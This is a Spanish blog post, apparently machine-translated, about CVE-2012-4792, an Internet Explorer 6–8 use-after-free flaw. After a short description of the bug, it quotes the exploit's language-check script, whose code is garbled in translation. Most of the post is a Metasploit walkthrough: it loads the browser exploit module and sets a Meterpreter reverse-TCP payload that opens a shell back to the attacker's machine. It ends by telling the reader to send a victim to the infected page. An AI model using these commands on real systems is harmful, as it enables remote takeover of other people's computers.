[CVE-2012-4792] Internet Explorer <= 8 Ejecución remota de código

IE-bug

Está circulando una nueva Oday para Internet Explorer.
El primer ataque se llevó a cabo 07 de diciembre 2012.

Esta vulnerabilidad permite la ejecución remota de código en Internet Explorer versiones de los siguientes:

  • Internet Explorer 6
  • Internet Explorer 7
  • Internet Explorer 8

El exploit es muy extraño, sólo afecta a algunas personas:

  var h = navigator.systemLanguage.toLowerCase ();
 if (h! = "zh-CN" && h! = "en-US" && H! = "zh-TW" && H! = "ja" && H! = "ru" && h! = "ko")
 {
   location.href = "about: blank";
 }

Descripción de la hazaña:

Este módulo se aprovecha de una vulnerabilidad encontrada en Microsoft Internet Explorer. La
use-after-free condición se produce cuando un objeto es liberado por CDwnBindInfo
FollowHyperlink2, pero una referencia se mantiene en CDOC. Como resultado, cuando la referencia
se utiliza de nuevo durante una recarga de la página, una memoria no válida que se utiliza es controlable,
y permite la ejecución de código arbitrario en el contexto del usuario.
Nota: Esta vulnerabilidad ha sido explotada en los ataques salvajes
Principalmente China / Taiwan / y computadoras con sede en EEUU.

Metasploit salió para demostrar la hazaña.

Actualizamos metasploit:
sudo msfupdate
Comenzamos la consola:
sudo msfconsole

Buscar exploit:
search CDwnBindInfo

Vamos a hacer el nuestro -. –
use exploit/windows/browser/ie_cdwnbindinfo_uaf
set SRVHOST 192.168.178.26
Por lo general, establecer la carga útil: D
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

Enviamos a la víctima en la página infectada y auge🙂

Pequeño vídeo de demostración:

Video demo

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: